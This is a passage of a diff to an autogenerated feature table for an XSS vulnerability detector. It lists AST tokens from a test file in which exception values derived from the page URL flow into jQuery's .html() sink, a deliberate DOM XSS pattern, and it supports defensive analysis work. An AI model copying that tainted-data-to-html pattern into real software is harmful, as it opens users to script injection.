autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:16 | $('myId').html | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:19 | $('myId').html(e) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:3:155:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:155:5:155:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:155:5:155:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:155:5:155:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19282,6 +130383,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:155:5:155:10 | 'myId' | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:155:5:155:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:155:5:155:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:13:155:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:13:155:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:13:155:16 | html | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:13:155:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:155:13:155:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:155:18:155:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:155:18:155:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:155:18:155:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19289,6 +130395,71 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:155:18:155:18 | e | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:155:18:155:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:155:18:155:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:9 | unknown | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:9 | unknown | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:9 | unknown | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:9 | unknown | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:9 | unknown | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:11 | exceptional return of unknown() | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:11 | exceptional return of unknown() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:11 | exceptional return of unknown() | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:11 | exceptional return of unknown() | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:11 | exceptional return of unknown() | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:11 | unknown() | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:11 | unknown() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:11 | unknown() | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:11 | unknown() | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:11 | unknown() | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:16 | unknown()[foo] | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:16 | unknown()[foo] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:16 | unknown()[foo] | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:16 | unknown()[foo] | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:3:159:16 | unknown()[foo] | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:13:159:15 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:13:159:15 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:13:159:15 | foo | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:13:159:15 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:159:13:159:15 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:160:11:160:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:160:11:160:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:160:11:160:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:160:11:160:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:160:11:160:11 | e | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:160:11:160:11 | e | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:160:11:160:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:160:11:160:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:160:11:160:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:160:11:160:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:3 | $ | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:11 | $('myId') | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:16 | $('myId').html | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:19 | $('myId').html(e) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:3:161:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:161:5:161:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:161:5:161:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:161:5:161:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19296,6 +130467,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:161:5:161:10 | 'myId' | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:161:5:161:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:161:5:161:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:13:161:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:13:161:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:13:161:16 | html | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:13:161:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:161:13:161:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:161:18:161:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:161:18:161:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:161:18:161:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19303,6 +130479,61 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:161:18:161:18 | e | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:161:18:161:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:161:18:161:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:165:3:165:7 | "foo" | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:165:3:165:7 | "foo" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:165:3:165:7 | "foo" | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:165:3:165:7 | "foo" | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:165:3:165:7 | "foo" | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:165:3:165:12 | "foo"[foo] | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:165:3:165:12 | "foo"[foo] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:165:3:165:12 | "foo"[foo] | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:165:3:165:12 | "foo"[foo] | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:165:3:165:12 | "foo"[foo] | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:165:9:165:11 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:165:9:165:11 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:165:9:165:11 | foo | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:165:9:165:11 | foo | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:165:9:165:11 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:166:11:166:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:166:11:166:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:166:11:166:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:166:11:166:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:166:11:166:11 | e | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:166:11:166:11 | e | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:166:11:166:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:166:11:166:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:166:11:166:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:166:11:166:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:3 | $ | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:11 | $('myId') | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:16 | $('myId').html | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:19 | $('myId').html(e) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner tainted resolve unknown tainted resolve Promise resolve inner foo resolve catch e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:167:3:167:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location search Promise resolve unknown foo resolve catch e $ myId html e null foo e $ myId html e unknown foo e $ myId html e foo foo e $ myId html e inner 